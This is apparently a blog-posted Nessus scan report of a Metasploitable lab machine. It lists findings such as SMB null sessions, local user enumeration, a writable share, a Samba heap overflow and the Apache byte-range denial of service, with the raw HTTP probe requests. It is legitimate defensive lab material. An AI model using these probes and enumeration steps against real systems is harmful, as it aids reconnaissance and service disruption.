METASPLOITABLE = Messenger Service
METASPLOITABLE = File Server Service
__MSBROWSE__ = Master Browser
WORKGROUP = Workgroup / Domain name
WORKGROUP = Master Browser
WORKGROUP = Browser Service Elections
This SMB server seems to be a SAMBA server (MAC address is NULL).
Description
The remote host listens on UDP port 137 or TCP port 445 and replies to
NetBIOS nbtscan or SMB requests.
Note that this plugin gathers information to be used in other plugins
but does not itself generate a report.
Solution
n/a
Risk Factor
None
Plugin publication date: 1999/10/12
Plugin last modification date: 2011/05/24
PORT (0/TCP)
Plugin ID: 35716
Ethernet Card Manufacturer Detection
Synopsis
The manufacturer can be deduced from the Ethernet OUI.
List of Hosts
192.168.0.67
Plugin Output
The following card manufacturers were identified :
08:00:27:b3:f9:f8 : CADMUS COMPUTER SYSTEMS
Description
Each ethernet MAC address starts with a 24-bit 'Organizationally
Unique Identifier'.
These OUI are registered by IEEE.
Solution
n/a
See also
Risk Factor
None
Plugin publication date: 2009/02/19
Plugin last modification date: 2011/03/27
PORT WWW (80/TCP)
Plugin ID: 11213
HTTP TRACE / TRACK Methods Allowed
Synopsis
Debugging functions are enabled on the remote web server.
List of Hosts
192.168.0.67
Plugin Output
To disable these methods, add the following lines for each virtual
host in your configuration file :
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
Alternatively, note that Apache versions 1.3.34, 2.0.55, and 2.2
support disabling the TRACE method natively via the 'TraceEnable'
directive.
Nessus sent the following TRACE request :
------------------------------ snip ------------------------------
TRACE /Nessus1706784164.html HTTP/1.1
Connection: Close
Host: 192.168.0.67
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
------------------------------ snip ------------------------------
and received the following response from the remote server :
------------------------------ snip ------------------------------
HTTP/1.1 200 OK
Date: Fri, 27 Jan 2012 22:25:59 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: message/http
TRACE /Nessus1706784164.html HTTP/1.1
Connection: Keep-Alive
Host: 192.168.0.67
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
------------------------------ snip ------------------------------
Description
The remote webserver supports the TRACE and/or TRACK methods. TRACE
and TRACK are HTTP methods that are used to debug web server
connections.
Solution
Disable these methods. Refer to the plugin output for more information.
See also
Risk Factor
Medium/ CVSS Base Score: 4.3
(CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVSS Temporal Score: 3.9(CVSS2#E:F/RL:W/RC:C)
Bugtraq ID
Vulnerability publication date: 2003/01/20
Plugin publication date: 2003/01/23
Plugin last modification date: 2011/09/19
Ease of exploitability : Exploits are available
PORT DNS (53/UDP)
Plugin ID: 35371
DNS Server hostname.bind Map Hostname Disclosure
Synopsis
The DNS server discloses the remote host name.
List of Hosts
192.168.0.67
Plugin Output
The remote host name is :
metasploitable
Description
It is possible to learn the remote host name by querying the remote
DNS server for 'hostname.bind' in the CHAOS domain.
Solution
It may be possible to disable this feature. Consult the vendor's
documentation for more information.
Risk Factor
None
Plugin publication date: 2009/01/15
Plugin last modification date: 2011/09/14
PORT CIFS (445/TCP)
Plugin ID: 10397
Microsoft Windows SMB LanMan Pipe Server Listing Disclosure
Synopsis
It is possible to obtain network information.
List of Hosts
192.168.0.67
Plugin Output
Here is the browse list of the remote host :
BT ( os : 0.0 )
METASPLOITABLE ( os : 0.0 )
VICTIM-EFA334F3 ( os : 0.0 )
Description
It was possible to obtain the browse list of the remote Windows system
by sending a request to the LANMAN pipe. The browse list is the list of
the nearest Windows systems of the remote host.
Solution
n/a
Risk Factor
None
Vulnerability publication date: 2000/01/01
Plugin publication date: 2000/05/09
Plugin last modification date: 2011/09/14
PORT CIFS (445/TCP)
Plugin ID: 10859
Microsoft Windows SMB LsaQueryInformationPolicy Function SID Enumeration
Synopsis
It is possible to obtain the host SID for the remote host.
List of Hosts
192.168.0.67
Plugin Output
The remote host SID value is :
1-5-21-1042354039-2475377354-766472396
The value of 'RestrictAnonymous' setting is : unknown
Description
By emulating the call to LsaQueryInformationPolicy(), it was possible
to obtain the host SID (Security Identifier).
The host SID can then be used to get the list of local users.
Solution
You can prevent anonymous lookups of the host SID by setting the
'RestrictAnonymous' registry setting to an appropriate value.
Refer to the 'See also' section for guidance.
See also
Risk Factor
None
Vulnerability publication date: 2000/01/31
Plugin publication date: 2002/02/13
Plugin last modification date: 2011/09/15
Ease of exploitability : Exploits are available
PORT SSH (22/TCP)
Plugin ID: 10267
SSH Server Type and Version Information
Synopsis
An SSH server is listening on this port.
List of Hosts
192.168.0.67
Plugin Output
SSH version : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
SSH supported authentication : publickey,password
Description
It is possible to obtain information about the remote SSH
server by sending an empty authentication request.
Solution
n/a
Risk Factor
None
Plugin publication date: 1999/10/12
Plugin last modification date: 2011/10/24
PORT CIFS (445/TCP)
Plugin ID: 11011
Microsoft Windows SMB Service Detection
Synopsis
A file / print sharing service is listening on the remote host.
List of Hosts
192.168.0.67
Plugin Output
A CIFS server is running on this port.
Description
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution
n/a
Risk Factor
None
Plugin publication date: 2002/06/05
Plugin last modification date: 2011/03/11
PORT SMB (139/TCP)
Plugin ID: 11011
Microsoft Windows SMB Service Detection
Synopsis
A file / print sharing service is listening on the remote host.
List of Hosts
192.168.0.67
Plugin Output
An SMB server is running on this port.
Description
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution
n/a
Risk Factor
None
Plugin publication date: 2002/06/05
Plugin last modification date: 2011/03/11
PORT (0/TCP)
Plugin ID: 54615
Device Type
Synopsis
It is possible to guess the remote device type.
List of Hosts
192.168.0.67
Plugin Output
Remote device type : general-purpose
Confidence level : 95
Description
Based on the remote operating system, it is possible to determine
what the remote system type is (eg: a printer, router, general-purpose
computer, etc).
Solution
n/a
Risk Factor
None
Plugin publication date: 2011/05/23
Plugin last modification date: 2011/05/23
PORT AJP13 (8009/TCP)
Plugin ID: 21186
AJP Connector Detection
Synopsis
There is an AJP connector listening on the remote host.
List of Hosts
192.168.0.67
Plugin Output
The connector listing on this port supports the ajp13 protocol.
Description
The remote host is running an AJP (Apache JServ Protocol) connector, a
service by which a standalone web server such as Apache communicates
over TCP with a Java servlet container such as Tomcat.
Solution
n/a
See also
Risk Factor
None
Plugin publication date: 2006/04/05
Plugin last modification date: 2011/03/11
PORT WWW (80/TCP)
Plugin ID: 24260
HyperText Transfer Protocol (HTTP) Information
Synopsis
Some information about the remote HTTP configuration can be extracted.
List of Hosts
192.168.0.67
Plugin Output
Protocol version : HTTP/1.1
SSL : no
Keep-Alive : yes
Options allowed : (Not implemented)
Headers :
Date: Fri, 27 Jan 2012 22:26:00 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Last-Modified: Wed, 17 Mar 2010 14:08:25 GMT
ETag: "107f7-2d-481ffa5ca8840"
Accept-Ranges: bytes
Content-Length: 45
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Description
This test gives some information about the remote HTTP protocol - the
version used, whether HTTP Keep-Alive and HTTP pipelining are enabled,
etc...
This test is informational only and does not denote any security
problem.
Solution
n/a
Risk Factor
None
Plugin publication date: 2007/01/30
Plugin last modification date: 2011/05/31
PORT WWW (80/TCP)
Plugin ID: 10107
HTTP Server Type and Version
Synopsis
A web server is running on the remote host.
List of Hosts
192.168.0.67
Plugin Output
The remote web server type is :
Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
You can set the directive 'ServerTokens Prod' to limit the information
emanating from the server in its response headers.
Description
This plugin attempts to determine the type and the version of the
remote web server.
Solution
n/a
Risk Factor
None
Plugin publication date: 2000/01/04
Plugin last modification date: 2011/11/30
PORT CIFS (445/TCP)
Plugin ID: 25216
Samba NDR MS-RPC Request Heap-Based Remote Buffer Overflow
Synopsis
It is possible to execute code on the remote host through Samba.
List of Hosts
192.168.0.67
Description
The version of the Samba server installed on the remote host is
affected by multiple heap overflow vulnerabilities, which can be
exploited remotely to execute code with the privileges of the Samba
daemon.
Solution
Upgrade to Samba version 3.0.25 or later.
See also
Risk Factor
Critical/ CVSS Base Score: 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
Bugtraq ID
Vulnerability publication date: 2007/05/14
Patch publication date: 2007/07/11
Plugin publication date: 2007/05/15
Plugin last modification date: 2011/04/13
Ease of exploitability : Exploits are available
Exploitable with: Canvas (CANVAS), Metasploit (Samba lsa_io_trans_names Heap Overflow)
PORT (0/TCP)
Plugin ID: 19506
Nessus Scan Information
Synopsis
Information about the Nessus scan.
List of Hosts
192.168.0.67
Plugin Output
Information about this scan :
Nessus version : 4.4.1
Plugin feed version : 201201251136
Type of plugin feed : HomeFeed (Non-commercial use only)
Scanner IP : 192.168.0.41
Port scanner(s) : nessus_syn_scanner
Port range : default
Thorough tests : no
Experimental tests : no
Paranoia level : 1
Report Verbosity : 1
Safe checks : yes
Optimize the test : yes
Credentialed checks : no
Patch management checks : None
CGI scanning : disabled
Web application tests : disabled
Max hosts : 80
Max checks : 5
Recv timeout : 5
Backports : Detected
Scan Start Date : 2012/1/27 22:23
Scan duration : 272 sec
Description
This script displays, for each tested host, information about the
scan itself :
- The version of the plugin set
- The type of plugin feed (HomeFeed or ProfessionalFeed)
- The version of the Nessus Engine
- The port scanner(s) used
- The port range scanned
- Whether credentialed or third-party patch management
checks are possible
- The date of the scan
- The duration of the scan
- The number of hosts scanned in parallel
- The number of checks done in parallel
Solution
n/a
Risk Factor
None
Plugin publication date: 2005/08/26
Plugin last modification date: 2011/12/23
PORT WWW (80/TCP)
Plugin ID: 55976
Apache HTTP Server Byte Range DoS
Synopsis
The web server running on the remote host is affected by a\denial of service vulnerability.
List of Hosts
192.168.0.67
Plugin Output
Nessus determined the server is unpatched and is not using any
of the suggested workarounds by making the following requests :
-------------------- Testing for workarounds --------------------
HEAD / HTTP/1.1
Host: 192.168.0.67
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Request-Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10
Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
HTTP/1.1 206 Partial Content
Date: Fri, 27 Jan 2012 22:28:06 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Last-Modified: Wed, 17 Mar 2010 14:08:25 GMT
ETag: "107f7-2d-481ffa5ca8840"
Accept-Ranges: bytes
Content-Length: 827
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: multipart/x-byteranges; boundary=4b78a02c058fd2ba3
-------------------- Testing for workarounds --------------------
-------------------- Testing for patch --------------------
HEAD / HTTP/1.1
Host: 192.168.0.67
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Request-Range: bytes=0-,1-
Range: bytes=0-,1-
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
HTTP/1.1 206 Partial Content
Date: Fri, 27 Jan 2012 22:28:10 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Last-Modified: Wed, 17 Mar 2010 14:08:25 GMT
ETag: "107f7-2d-481ffa5ca8840"
Accept-Ranges: bytes
Content-Length: 274
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: multipart/x-byteranges; boundary=4b78a0303708a2bab
-------------------- Testing for patch --------------------
Description
The version of Apache HTTP Server running on the remote host is
affected by a denial of service vulnerability. Making a series of
HTTP requests with overlapping ranges in the Range or Request-Range
request headers can result in memory and CPU exhaustion. A remote,
unauthenticated attacker could exploit this to make the system
unresponsive.
Exploit code is publicly available and attacks have reportedly been
observed in the wild.
Solution
Upgrade to Apache httpd 2.2.21 or later, or use one of the workarounds
in Apache's advisories for CVE-2011-3192. Version 2.2.20 fixed the
issue, but also introduced a regression.
If the host is running a web server based on Apache httpd, contact the
vendor for a fix.
See also
Risk Factor
High/ CVSS Base Score: 7.8
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVSS Temporal Score: 6.4(CVSS2#E:F/RL:OF/RC:C)
Bugtraq ID
CERT:405811
EDB-ID:17696
EDB-ID:18221
IAVA:2011-A-0120
IAVA:2011-A-0130
IAVA:2011-A-0141
Vulnerability publication date: 2011/08/19
Patch publication date: 2011/08/25
Plugin publication date: 2011/08/25
Plugin last modification date: 2011/12/12
Ease of exploitability : Exploits are available
PORT SSH (22/TCP)
Plugin ID: 39520
Backported Security Patch Detection (SSH)
Synopsis
Security patches are backported.
List of Hosts
192.168.0.67
Plugin Output
Give Nessus credentials to perform local checks.
Description
Security patches may have been 'back ported' to the remote SSH server
without changing its version number.
Banner-based checks have been disabled to avoid false positives.
Note that this test is informational only and does not denote any
security problem.
Solution
N/A
See also
Risk Factor
None
Plugin publication date: 2009/06/25
Plugin last modification date: 2011/03/16
PORT (0/TCP)
Plugin ID: 25220
TCP/IP Timestamps Supported
Synopsis
The remote service implements TCP timestamps.
List of Hosts
192.168.0.67
Description
The remote host implements TCP timestamps, as defined by RFC1323. A
side effect of this feature is that the uptime of the remote host can
sometimes be computed.
Solution
n/a
See also
Risk Factor
None
Plugin publication date: 2007/05/16
Plugin last modification date: 2011/03/20
PORT CIFS (445/TCP)
Plugin ID: 42411
Microsoft Windows SMB Shares Unprivileged Access
Synopsis
It is possible to access a network share.
List of Hosts
192.168.0.67
Plugin Output
The following shares can be accessed using a NULL session :
- tmp - (readable,writable)
+ Content of this share :
..
.ICE-unix
.X11-unix
4556.jsvc_up
Description
The remote has one or more Windows shares that can be accessed through
the network with the given credentials.
Depending on the share rights, it may allow an attacker to read/write
confidential data.
Solution
To restrict access under Windows, open Explorer, do a right click on
each share, go to the 'sharing' tab, and click on 'permissions'.
Risk Factor
High/ CVSS Base Score: 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Temporal Score: 7.5(CVSS2#E:H/RL:U/RC:ND)
Bugtraq ID
Vulnerability publication date: 1999/07/14
Plugin publication date: 2009/11/06
Plugin last modification date: 2011/03/27
Ease of exploitability : No exploit is required
PORT CIFS (445/TCP)
Plugin ID: 25240
Samba Server Detection
Synopsis
An SMB server is running on the remote host.
List of Hosts
192.168.0.67
Description
The remote host is running Samba, a CIFS/SMB server for Linux and
Unix.
Solution
n/a
See also
Risk Factor
None
Plugin publication date: 2007/05/16
Plugin last modification date: 2011/09/14
PORT CIFS (445/TCP)
Plugin ID: 10394
Microsoft Windows SMB Log In Possible
Synopsis
It is possible to log into the remote host.
List of Hosts
192.168.0.67
Plugin Output
- NULL sessions are enabled on the remote host
Description
The remote host is running Microsoft Windows operating
system or Samba, a CIFS/SMB server for Unix. It was
possible to log into it using one of the following
accounts :
- NULL session
- Guest account
- Given Credentials
Solution
n/a
See also
Risk Factor
None
Vulnerability publication date: 1999/01/01
Plugin publication date: 2000/05/09
Plugin last modification date: 2011/09/15
Ease of exploitability : Exploits are available
Exploitable with: Metasploit (Microsoft Windows Authenticated User Code Execution)
PORT (0/ICMP)
Plugin ID: 10114
ICMP Timestamp Request Remote Date Disclosure
Synopsis
It is possible to determine the exact time set on the remote host.
List of Hosts
192.168.0.67
Plugin Output
The difference between the local and remote clocks is -25201 seconds.
Description
The remote host answers to an ICMP timestamp request. This allows an
attacker to know the date that is set on the targeted machine.
This may help an attacker to defeat all time-based authentication
protocols.
Solution
Filter out the ICMP timestamp requests (13), and the outgoing ICMP
timestamp replies (14).
Risk Factor
None
Vulnerability publication date: 1995/01/01
Plugin publication date: 1999/08/01
Plugin last modification date: 2011/11/15
PORT (0/UDP)
Plugin ID: 10287
Traceroute Information
Synopsis
It was possible to obtain traceroute information.
List of Hosts
192.168.0.67
Plugin Output
For your information, here is the traceroute from 192.168.0.41 to 192.168.0.67 :
192.168.0.41
192.168.0.67
Description
Makes a traceroute to the remote host.
Solution
n/a
Risk Factor
None
Plugin publication date: 1999/11/27
Plugin last modification date: 2011/03/21
PORT CIFS (445/TCP)
Plugin ID: 10860
SMB Use Host SID to Enumerate Local Users
Synopsis
It is possible to enumerate local users.
List of Hosts
192.168.0.67
Plugin Output
- Administrator (id 500, Administrator account)
- nobody (id 501, Guest account)
- root (id 1000)
- root (id 1001)
- daemon (id 1002)
- daemon (id 1003)
- bin (id 1004)
- bin (id 1005)
- sys (id 1006)
- sys (id 1007)
- sync (id 1008)
- adm (id 1009)
- games (id 1010)
- tty (id 1011)
- man (id 1012)
- disk (id 1013)
- lp (id 1014)
- lp (id 1015)
- mail (id 1016)
- mail (id 1017)
- news (id 1018)
- news (id 1019)
- uucp (id 1020)
- uucp (id 1021)
- man (id 1025)
- proxy (id 1026)
- proxy (id 1027)
- kmem (id 1031)
- dialout (id 1041)
- fax (id 1043)
- voice (id 1045)
- cdrom (id 1049)
- floppy (id 1051)
- tape (id 1053)
- sudo (id 1055)
- audio (id 1059)
- dip (id 1061)
- www-data (id 1066)
- www-data (id 1067)
- backup (id 1068)
- backup (id 1069)
- operator (id 1075)
- list (id 1076)
- list (id 1077)
- irc (id 1078)
- irc (id 1079)
- src (id 1081)
- gnats (id 1082)
- gnats (id 1083)
- shadow (id 1085)
- utmp (id 1087)
- video (id 1089)
- sasl (id 1091)
- plugdev (id 1093)
- staff (id 1101)
- games (id 1121)
- libuuid (id 1200)
Note that, in addition to the Administrator and Guest accounts, Nessus
has enumerated only those local users with IDs between 1000 and 1200.
To use a different range, edit the scan policy and change the 'Start
UID' and/or 'End UID' preferences for this plugin, then re-run the
scan.
Description
Using the host security identifier (SID), it is possible to enumerate local users
on the remote Windows system.
Solution
n/a
Risk Factor
None
Vulnerability publication date: 1998/04/28
Plugin publication date: 2002/02/13
Plugin last modification date: 2011/09/15
Ease of exploitability : Exploits are available
PORT DNS (53/UDP)
Plugin ID: 10028
DNS Server BIND version Directive Remote Version Disclosure
Synopsis
It is possible to obtain the version number of the remote DNS server.
List of Hosts
192.168.0.67
Plugin Output
The version of the remote DNS server is :
9.4.2
Description
The remote host is running BIND or another DNS server that reports its
version number when it receives a special request, for the text
'version.bind' in the domain 'chaos'.
This version is not necessarily accurate and could even be forged, as
some DNS servers send the information based on a configuration file.
Solution
It is possible to hide the version number of bind by using the
'version' directive in the 'options' section in named.conf
Risk Factor
None
Vulnerability publication date: 1991/01/01
Plugin publication date: 1999/10/12
Plugin last modification date: 2011/05/24
PORT WWW (80/TCP)
Plugin ID: 43111
HTTP Methods Allowed (per directory)
Synopsis
This plugin determines which HTTP methods are allowed on various CGI\directories.
List of Hosts
192.168.0.67
Plugin Output
Based on the response to an OPTIONS request :
- HTTP methods GET HEAD OPTIONS POST TRACE are allowed on :
/
Description
By calling the OPTIONS method, it is possible to determine which HTTP
methods are allowed on each directory.
As this list may be incomplete, the plugin also tests - if 'Thorough
tests' are enabled or 'Enable web applications tests' is set to 'yes'
in the scan policy - various known HTTP methods on each directory and
considers them as unsupported if it receives a response code of 400,
403, 405, or 501.
Note that the plugin output is only informational and does not
necessarily indicate the presence of any security vulnerabilities.
Solution
n/a
Risk Factor
None
Plugin publication date: 2009/12/10
Plugin last modification date: 2011/07/08
192.168.0.67 | |
Scan Time | |
Start time: | Fri Jan 27 22:23:57 2012 |
End time: | Fri Jan 27 22:28:29 2012 |
Number of vulnerabilities | |
High | 4 |
Medium | 2 |
Low | 35 |
| |
Remote Host Information | |
Operating System: | Linux Kernel 2.6 on Ubuntu 8.04 (hardy) |
NetBIOS name: | METASPLOITABLE |
IP address: | 192.168.0.67 |
MAC addresses: | 08:00:27:b3:f9:f8 |
|
Subscribe to:
Posts (Atom)
Slack Space
Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...